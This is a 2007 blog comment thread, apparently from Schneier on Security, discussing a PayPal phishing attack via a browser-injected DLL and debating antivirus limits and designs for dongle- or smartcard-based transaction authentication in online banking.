Comments

Albireo May 29, 2007 7:58 AM

I looked at the two screenshots, and I’m a bit confused… The two URIs seems right, and if the system is really malware-free, how could they hijack the browser like this?

Clive Robinson May 29, 2007 8:07 AM

It sounds like a MITM attack with the attacker actualy in your machine, which effectivly gives them an extrodinary level of attack ability.

If ever there was a better reason needed to use active authentication in both directions (you->bank, bank->you) and on the actuall transaction this is probably it.

However all the authentication would need to be through a side channel or external device (dongle) that you could type the chalenges into…

-ac- May 29, 2007 8:08 AM

Will it turn out to be yet another zero day, yet another warning not to use IE, yet another warning not to visit “untrusted sites”?
Also, does this attack classify as a man-in-the-endpoint attack?

DaveShaw May 29, 2007 8:10 AM

So, once again firefox outwits IE.

This guy sounds like he understands the risks on the net, so how did he get the dll/code injection in the first place, with him been so careful about where he browses to?

Maybe him ignored it whilst browsing “questionable content”.

DaveShaw May 29, 2007 8:12 AM

PS, the bad grammer was a mistake. But it kinda fits as this is a Phishing Thread. 🙂

Hadi Hariri May 29, 2007 8:31 AM

The irony of all this is that he uses IE and Norton ! Thel ast thing that ever came out of Norton that was good was Norton Commander.

Albatross May 29, 2007 9:03 AM

“he’s been careful to practice good PC hygiene. He runs Norton 360 and uses the latest IE version”

Wow, I’m surprised placing the contradiction this closely together didn’t throw a circuit-breaker somewhere…

bob May 29, 2007 9:07 AM

Side-channel comment: It would be a lot easier to verify the top level issuer CA if they didnt each have 23 different spellings. And why dont the browsers automatically recognize the DoD CAs? 24,000,000 customers not enough to make it worthwhile?

Juice May 29, 2007 9:24 AM

On a side note, do anti-phishing filters use grammar checkers, or do they rely on detecting technical clues like authentication, misnamed anchors and redirects?

merkelcellcancer May 29, 2007 9:32 AM

The most important rule to remember is that paypal and banks will ‘Never” send out this type of request by email.

I submit all requests like this directly to spamcop and review the results to see exactly where this originated. It is never paypal, ebay, or any legitimate banking institution.

http://www.spamcop.net/

It is the social engineering factor that people are falling for.

supersnail May 29, 2007 9:49 AM

RTFA guys.

The user was not clicking on an e-mail. He was going to his normal site in the normal way — directly via the browser.

He had done all the “normal” security things you are meant to do on your PC Windows update and anti-virus and anti-phishing etc.
The url was NOT spoofed.

Yet he still gets a badly worded request for user id and password.

Most likely he has a trojan on his machine which the anti-virus failed to detect and anti-phishing failed to block.

In the register posts you will note a couple of posters who say they have seen this attack on Firefox as well.

On the registers posts you will also see several comments regarding totally irreevent kneejerk “should have used firefox” posts.
And as for the “should have used linux” it is not yet a viable option for most users — maybe when it comes pre-insalled on Dell — but not at the moment. And anyway its just delaying the problem, as soon as Apple or Ubuntu have more than 5% of the market they will become serious targets too.

The articles salient point is that here is an average but dilligent and competent user who has followed all the standard advice and procedures regarding security yet he still has phishing software on his browser.

Dimitris Andrakakis May 29, 2007 9:51 AM

@Bruce,

I think this classifies as the type attack you’ve so many times warned against; the attack where malicious code lets the user handle the authentication (single- or two-factor).

nobody May 29, 2007 10:26 AM

RTFA:
“Based on our description, […] guesses those experiencing this attack have inadvertently installed an html injector. That means the victims’ browsers are, in fact, visiting the PayPal website or other intended URL, but that a dll file that attaches itself to IE is managing to read and modify the html while in transit.”

With something like dll injection (userland hooks, like IAT table hooking), the backdoor could intercept the html code, which is usually send by an function in http.sys, even before it reaches the tls/ssl layer
(check http://www.rootkit.com or their book for more information).

This is of course also possible with firefox or any other browser, although needing a little different techique as they have their own html rendering librarys.

David Wilson May 29, 2007 10:48 AM

As someone who has repeatedly done the thankless task of hand-cleaning Windows machines for people, it’s amazing what sort of stuff can be found if you bother looking at what you’re ripping out.

My ex’s computer had several million copies of a DLL in her system32 directory, that appeared to be a buggy worm stuck in some sort of loop. Neither Norton nor SpyBot would detect this.

The PayPal scam mentioned in the article looks like the classic sort of thing you can do with DLL injection. I’m really glad to see that this article is being given press, as it highlights the often total inadequacies of the overpriced AV software out there. It’s also pretty heartening to see that it looks to be an end user who spotted this in the first place.

As for AV software, I install ClamAV for people and specifically remove Norton, as it is nothing but a melodramatic warmonger designed to instill fear into the user who doesn’t understand its output (“ALERT!!! IVE STOPPED A PORT PROBE!!! PORT 1321!!!”). Enable Firewall, install ClamAV, look for the lock sign, don’t ignore warnings, stick to well-known sites if you can, and have a nice day. 🙂

Todd Knarr May 29, 2007 10:52 AM

One thing this person forgot: scanning hygiene. He’s using software to scan for malware, but he’s doing it on the running system. First rule: if a system is infected, you cannot trust that system or anything running on it. That includes the scanning software. The fact that Norton and the rest give a clean bill of health just means the malware’s gotten it’s hooks into them too, or into the system at such a low level that it’s able to hide itself from them. Old hat, stealth viruses were doing that on DOS 20 years ago and Windows offers lots more ways to do the necessary things these days.

There’s only one way to run software to scan your system for malware. That’s while booted from seperate media that’s been kept physically read-only whenever it’s been exposed to your normal system and which is completely self-contained and treats your system only as a source of data to scan.

Lars May 29, 2007 11:14 AM

Supersnail said:

“The user was not clicking on an e-mail. He was going to his normal site in the normal way — directly via the browser.”

Actually, there’s nothing in TFA that says anything about how he got to the pages at all. For all we know, he did click on a link in an e-mail, or opened the page through some other means…

Considering the fact that the guy appears to understand that phishing happens, I’m surprised that he still uses IE to visit the most phished website around.

Clive Robinson May 29, 2007 11:25 AM

@ALL

Why are you trying to put a band aid on the symptoms of a broken bone?

There will always be another DLL injection or other attack that is going to get past malware fillters. At it’s simplist it’s a zero day issue. There will always be a window of oportunity for the bad guys before even the best filter writer knows the problem exists, then they have to make a filter, ship it to the customer who then has to install it all of which further opens the window of opportunity.

The real issue is the the “broken bone” of the financial organisations in that they all appear to lack a sensible two way authentication and transaction authentication system. Sadly they should all know better, but as long as it costs less to ignore the issue then they will.

Back in 2000 I discussed how to prevent this general class of attack where a malicious person has control of your PC.

The answer is that the only way is out of channel authentication of both entities and the required parts of the transaction.

Nothing else will work and we will be discussing some new malware attack this time next year and the year after….

Dry May 29, 2007 12:19 PM

I wonder how much more successful these attempts would be if they spent as much time getting the grammar right as they do the code, hah

Dry May 29, 2007 12:20 PM

I wonder how successful these attempts would be if they spent as much time getting the grammar right as they do the code, heh

MSB May 29, 2007 12:57 PM

@Clive Robinson

“The answer is that the only way is out of channel authentication of both entities and the required parts of the transaction.”

Two-way authentication is not by itself a solution to the problem. When using authentication, one has to be very careful about exactly what is authenticated, and what is not. It is not sufficient for both the bank and the customer to know that they are communicating with each other.

If the user has to rely on the user interface provided by a vulnerable host, a man-in-the-middle attack can target the path between a piece of software executing in memory and the physical user interface. It is not enough to use an secure external authenticator to bootstrap a “secure” session if plaintext data is handled by a vulnerable host.

dragonfrog May 29, 2007 1:13 PM

@ Clive Robinson

I believe it would be possible to do without out-of-channel communication between entities – or at least, with only a single out-of-channel communication, when the user first sets up internet banking.

The idea would be that the user has a smart-card like device, e.g. a USB dongle, which is able to
– take from the untrusted PC a description of a proposed transaction, signed with the bank’s private key
– verify the signature against its internally stored copy of the bank’s public key
– display on its own screen (not the untrusted PC’s screen) the description of the transaction
– receive a keypress from the user (using buttons on the device, not the keyboard) – “yes, I approve the transaction”, or “no, I reject the transaction”
– countersign the description of the transaction with the user’s private key, which is stored only on the device itself
– return the countersigned description to the PC.

The user-interface mechanics of moving the signed transaction descriptions from the bank’s website, to the device, and back, are a nightmare left to the reader.

This just moves the problem of trusting a user-maintained device from one device to another – but at least it’s a single-purpose, auditable piece of hardware, and not a general-purpose $1500 porn machine.

What some banks are apparently doing is now issuing one-time password tokens to users – which of course doesn’t validate intention at all, just that the user had some sort of intention or they wouldn’t have typed the one-time password…

nedu May 29, 2007 1:13 PM

“[A]uthentication […] through a side channel or external device (dongle) that you could type the challenges into.”

@Clive Robinson,

Sitting next to me, I have a HP48 calculator. It’s capable of communicating over both wireless (infrared) and wired (RS-232) links. It has persistent storage which, among other things, stores an event log. It’s powerful enough to handle common symmetric and asymmetric cipher algorithms. And it goes without saying that it has a keypad and LCD screen.

In short, my HP48 meets many of the requirements for a portable secure terminal.

But, not only is it just a little bit too large and bulky for the average person to carry in their wallet, it has a number of other features that make it unsuitable for use as a special purpose security device. Chiefly, it interprets a general purpose language, and it’s capable of displaying user-generated forms.

In contrast to my HP48, many people carry around one of those teensy credit-card sized calculators. A device in that credit-card sized form factor would be about right for a special-purpose security keypad: A one-line LCD display and 16 keys.

Chris May 29, 2007 1:33 PM

Although not as secure as a remote dongle with a keypad for remote authentication, you could like derive some benefit from something like the code wheels used by computer games in the mid-eighties. The bank would produce a challenge — or some details of the transaction would be the challenge — and the end user has a code wheel to produce a response.

This is cardboard and plastic (“cheap!”), even when you are issuing unique tokens to each person.

This failed as a technique for protecting computer games because the holders of the physical token were the ones who wanted to break the security – their economic incentives were not aligned. It can work for transactions because the economic interests of the bank and the user are aligned — they both want to protect the account.

X the Unknown May 29, 2007 1:34 PM

@dragonfrog: “…the user has a smart-card like device…”

This IS, however, an out-of-channel communication. The Bank has just proxied part of it’s authentication over to a (supposedly secure) device that uses an
algorithm-and-key supplied by the bank, to handle part of the transaction.

That being said, it’s still a nicer solution than requiring a phone-call/text-message/etc. through a communications channel known to be distinct from the ‘Net connection.

nedu May 29, 2007 1:37 PM

“It is not enough to use an secure external authenticator to bootstrap a ‘secure’ session if plaintext data is handled by a vulnerable host.”

@MSB

The biggest, obvious problem in banking and payment systems today is the ubiquitous overloading of a semi-public account identifier as an authentication token.

Your bank or credit card account identifier has to be shared with too many parties to consider it any kind of secret. When you can obtain money from someone just by knowing their account number, well, that’s just wrong.

In a shared-secret architecture, disclosure of the secret must be on a limited, need-to-know basis.

MSB May 29, 2007 1:56 PM

@nedu

“The biggest, obvious problem in banking and payment systems today is the ubiquitous overloading of a semi-public account identifier as an authentication token.”

The mixing of the roles of account identifier and reusable secret credential is certainly a problem in general, but that’s not the focus of the article. The vulnerability in the article is still a problem even if the information being stolen is not some kind of reusable credential.

TooManyCAs May 29, 2007 2:07 PM

@bob
“Side-channel comment: It would be a lot easier to verify the top level issuer CA if they didnt each have 23 different spellings.”

It would be even easier if there were only a few top level issuer CAs with trusted root certs in the browser (or OS). At last count, there were over 100 CAs that have trusted root certificates in the IE browser. I haven’t checked, but I suspect Firefox has just as many.

LUAandUAC May 29, 2007 2:15 PM

If this person is as diligent as this article implies, I would be curious to know how this “HTML injection DLL” could have gotten installed on their computer.

Certainly, this person isn’t logging into a user account which has administrator privileges… right?

nedu May 29, 2007 2:17 PM

@MSB

The spoofed form asks for:
Name, DOB, SSN, Mother’s Maiden Name, Card No., Card Expiration, Card CVV2, ATM PIN, Checking Acct. No., Routing No.

With the sole exception of “ATM PIN”, none of these identifiers should be sufficient to obtain money from the user.

We could teach users to never, ever, ever enter their authenticating PIN into any device other than their own, personal bank-issued keypad.

MSB May 29, 2007 2:27 PM

@TooManyCAs

“It would be even easier if there were only a few top level issuer CAs with trusted root certs in the browser (or OS). At last count, there were over 100 CAs that have trusted root certificates in the IE browser.”

Having numerous top-level CAs is but one problem, another problem is that the initial set of trusted CAs is configured by the browser developer, not the user. I suspect that most users never check, much less change, the set of CAs trusted by the browsers they use. They haven’t even heard of some of the entities they “trust”.

MSB May 29, 2007 2:37 PM

@nedu

‘The spoofed form asks for:
Name, DOB, SSN, Mother’s Maiden Name, Card No., Card Expiration, Card CVV2, ATM PIN, Checking Acct. No., Routing No.

With the sole exception of “ATM PIN”, none of these identifiers should be sufficient to obtain money from the user.’

That depends on the individual institutions. The pieces of info you listed may be enough to get a password reset from some bank.

nedu May 29, 2007 2:49 PM

“The pieces of info you listed may be enough to get a password reset from some bank.”

@MSB,

When I wrote, “should”, that was normative, and not descriptive. Iow, the way things should be, not necessarily how they are.

If a user shows up in person with their security device and says something like, “My credit-card is broken”, then additional identifers/authenticators should be sufficient to get the bank to reset the user’s password.

But in general, for payment transactions, a bank that pays out remotely to anyone joe with a few pieces of information should risk their own money and credit.

Meanwhile, mere possesion of a security device shouldn’t permit someone to brute-force a short PIN without raising an alarm at the bank.

Jay May 29, 2007 3:12 PM

I think its pretty straight forward to not to fool by these as all these site, paypal, HSBC says at the introduction to its online accounting that no personal details will be asked online or by phone in full. But you are only suppose type parts of it when requested. So people should be vigilant about it.That will prevent these kinds of fraudulent tactics.

Clive Robinson May 29, 2007 3:16 PM

@MSB, All

“Two-way authentication is not by itself a solution to the problem. When using authentication, one has to be very careful about exactly what is authenticated, and what is not. It is not sufficient for both the bank and the customer to know that they are communicating with each other.”

Yes I agree 100% with that which is why I said,

“authentication of both entities and the required parts of the transaction.”

Initialy both parties have to establish they have some form of (untrusted) communications link, otherwise the parties should cease to try communicating.

When they have established that they atleast have some form of “untrusted” communications path they then need to transfer data to one another in a way that both parties can be assured is valid this is the authentication of the “required parts of the transaction”.

Now there are very many ways to do this but lets assume a very simple system to convay the idea (then shoot holes in it as you wish 😉

1 The customer selects account to account transfere

2 The bank sends a form with an “only human readable number” which is unique to the users dongle and in time (all validation codes sent by the bank will be human readable only).

3 the user types this number into the dongle which shows an appropriate go/nogo indication. The number could also be used to set the dongle into a given mode for the account to account transfer mode.

4, the user types the “to account number” into the dongle which prints out an encrypted code that the user then types into the appropriate space on the form.

5 the same with the amount and any other field that requires verification.

6 the user then submits the form back to the bank.

7 the bank sends back a verification code that the user types in on the dongle which indicates if the code is correct for the data entered and then gives the user a final authorisation code for the whole transaction.

8 the user types this in and sends it off to the bank which sends a final closing code which the user types in to check if the transaction has been authenticated.

If the codes are unique to the dongle being used and in time then the attacker has a bit of a problem in that they do not see the transaction details in plain text nor can they predict what the authentication codes are going to be either from the user or from the bank.

I am also assuming that the codes will contain a degree of error protection within them to prevent typos confusing things etc.

Oh and the “only human readable” stuff from the bank reduces to near zero the ability for software to read and undersatand the data, therefore the attacker also has to be human as well and present for the transaction.

The use of these two technologies hopefully reduces the chance of a succesfull phish down to the security of the dongle or better.

I appriciate that the system is overly complex but can it be made simpler and still protect the transaction properly?

As I said it’s a simple idea to show that it is possible for the transaction to happen even in an untrusted channel with not only both sides proving who they are but the required details of the transaction it’s self.

Please feel free not only to shoot holes in it but also come up with other ideas. Hopefully it might start an “open” aproach to making all financial transactions more secure which would benifit not only us the customer but the banks etc as well…

Evan Murphy May 29, 2007 3:19 PM

@LUAandUAC,

I don’t know that many details about Windows, but in this case, it doesn’t matter how restricted the user account is. The problem is that the web browser is running in the same security context as the rest of the user’s programs. The web browser executable stored on disk can’t be tampered with, but when a restricted user account starts it, that image is mapped or copied into that user’s memory. Anything that a running executable image does internally—or more importantly, anything you want to do to it from outside—is legit, because you’re modifying your own in-memory instance of the running image and its environment.

All common operating systems share these features: allowing a user to do things like dynamically load shared objects and attach debuggers. In Linux, take a look at the havoc you can wreak with LD_PRELOAD shims, for example. As long as you have this ability (and it’s pretty fundamental), attackers can tamper with your programs while they’re running, regardless of the security context you’re in.

Joe May 30, 2007 1:50 PM

Couldn’t this be that attack where a user visits a web page which downloads code which is then installed in the router?

wm May 31, 2007 6:42 AM

@Clive Robinson (secure banking protocol)

I think it can be made simpler.

How about this:
(1) The user enters the transaction they want to perform into their bank-supplied smartcard (source and destination account numbers, amount, etc.).
(2) The smartcard adds a unique serial number (e.g. a counter stored internally in the card; it doesn’t have to be unguessable) to prevent replay attacks.
(3) The smartcard digitally signs the transaction+counter using a key that is unique to your account and known to the bank.
(4) You send the transaction+counter+signature to the bank over the (untrusted) connection. Optionally, you could encrypt the message for confidentiality, but I don’t think that’s required for security against fraud.

Or have I overlooked something?

I’m assuming that the card can be trusted, of course, and that you know the genuine account number that you want to send money to.

(Actually, you probably don’t know the account number if you’re buying something from a web site you’ve not used before — this is still vulnerable to a MITM attack — but there’s nothing you can do to verify the authenticity of a communication from someone with whom you share no secrets at all.)

wm May 31, 2007 6:50 AM

@Clive Robinson and myself:

Under the protocol I described above, you don’t actually know if the web site you’re talking to is the bank, and they don’t know if the person they’re talking to is you. However, this doesn’t matter, because:

The bank doesn’t need to know who is sending them the message; all that matters is whether the transaction was approved by you (which can be determined from the signature).

You don’t need to know that you’re talking to the bank, because nobody receiving your message can do anything with it except use it to carry out the transaction you wanted done anyway. (They would have to break the digital signature mechanism to change it to a different transaction, and they can’t re-use the message repeatedly to perform the same transaction over and over again because the message has a unique serial number.) An attacker could pretend to be the bank, accept your message, and then discard it for a denial-of-service attack, but that’s about it (and there are easier ways to mount a DoS).

nedu May 31, 2007 10:40 PM

@wm

I’m not sure if you’ve overlooked something, or just skimmed over it: For two-factor authentication, the bank needs to verify that the operator who posesses the card also knows a shared secret. Otherwise, the card –even if protected by a local password– isn’t resistant to brute-force attacks by an unauthorized person.

One way to do this would be for the bank to send the card an unguessable nonce for each transaction. Then the card calculates a one-way hash from a concatenation of the nonce and a value derived from the user’s password(*). The hash is returned to the bank as part of the transaction record signed by the card.

(*) A value derived from user’s password: The bank need not store the user’s card password. In fact, it probabably shouldn’t. But the bank may need to know a salted hash of the user’s password. So the card might take the salt and calculate a first hash of the password to obtain the shared secret, then calculate the second hash from the shared secret and the nonce.

wm June 1, 2007 2:54 AM

@nedu (the need to protect against brute-force attacks on the smartcard)

Good point.

I guess I was assuming that the smartcard would be protected against unauthorised access, probably by having a password with a limited number of wrong tries before the card locks up and won’t work at all any more (and you’d need to get a new one from the bank). If you allow, say, 10 wrong guesses that should stop brute-force attacks while not locking out the genuine owner very often.

You have to be a bit careful, because if you just reset the wrong-tries count to zero when you get a successful login, that allows someone with regular access to the card (like your room-mate) to brute-force it half-a-dozen tries at a time between your legitimate logins. This could possibly be defended against by the card displaying at the login prompt the number of failed logins — the legitimate owner would expect this to be zero almost all the time (except just after getting a login wrong, of course).

clive robinson June 1, 2007 4:26 AM

@wm

There is a problem with digital signitures which is the size versus security.

Take a (belived to be) insecure 1024 bit RSA message and divide by 4 which gives you 256 key pressess on a hex keypad, for the user which has a certain degree of ouch factor as well as othr problems.

I was thinking about using a time dependent stream cipher with built in safe gaurds to stop various attacks like bit flipping etc.

wm June 1, 2007 9:00 AM

@clive robinson (on the amount of typing required)

That certainly needs to be a consideration, but I don’t think public-key signatures are required for this application, are they? It’s not as if anyone in the world needs to be able to verify the authenticity of a message; just the bank.

That being the case, and assuming that the bank has other measures to prevent insiders getting hold of the signing key for your account, a 128-bit symmetric-key signature could be used.

And since the signature only needs to be typed into an ordinary PC (not into the smartcard), you can use a full alphanumeric keyboard. Even with a case-insensitive coding, that easily gives you 5 bits per character, reducing the typing down to 26 characters (plus the transation details themselves).

That’s around the same amount as people have routinely been required to enter to validate a software licence installation, for example.

nedu June 1, 2007 12:13 PM

“… someone with regular access to the card (like your room-mate)…”

@wm,

The threat model that I was considering was the case where the user loses the card and it falls into the hands of a sophisticated attacker. In that case, assume that all of the secrets present in the card can be compromised.

Further, a really sophisticated attacker might passively listen to all of your previous transactions with the bank, then after accumulating enough data, choose when to steal your card.

For the roomate case, though, if we assume that the attacker obtains possession of the card, obtains the all card secrets, surreptitiously installs a keylogger, then returns the card with no obvious marks on the case or wires hanging out it… well, it’s probably just game over.

So, for this discussion, we should probably first figure out what your roomate’s capabilities are.

Pogo June 1, 2007 10:50 PM

You can only fold a piece of paper seven times, period.

Why do the writers here keep “bending themselves double” in order to justify the use of computers to perform simple banking transactions? It should be amply obvious by this time that NO internet based transaction is secure. A person might as well stand on a street corner and shout out their personal info. This problem will never be solved by wise-acreing yet another software “solution”. Just more guess-work.

In my opinion, there is a somewhat more secure method that doesn’t involve computers: Go to the bank in person and do the transaction with a live Teller. Of course, this idea is not only effective, it is too blindingly simple, especially for those whose job security it would affect.

“we have met the enemy and he is us”

Clive Robinson June 4, 2007 5:31 AM

@Pogo,

“Why do the writers here keep “bending themselves double” in order to justify the use of computers to perform simple banking transactions?”

Because in the U.K. atleast the banks want to get rid of branches and tellers as “negativly effecting shareholder value”.

So your,

“Go to the bank in person and do the transaction with a live Teller.”

Is increasingly not an option in the U.K.

Leave a comment

Login

Allowed HTML <a href="URL"> • <em> <cite> <i> • <strong> <b> • <sub> <sup> • <ul> <ol> <li> • <blockquote> <pre> Markdown Extra syntax via https://michelf.ca/projects/php-markdown/extra/

Sidebar photo of Bruce Schneier by Joe MacInnis.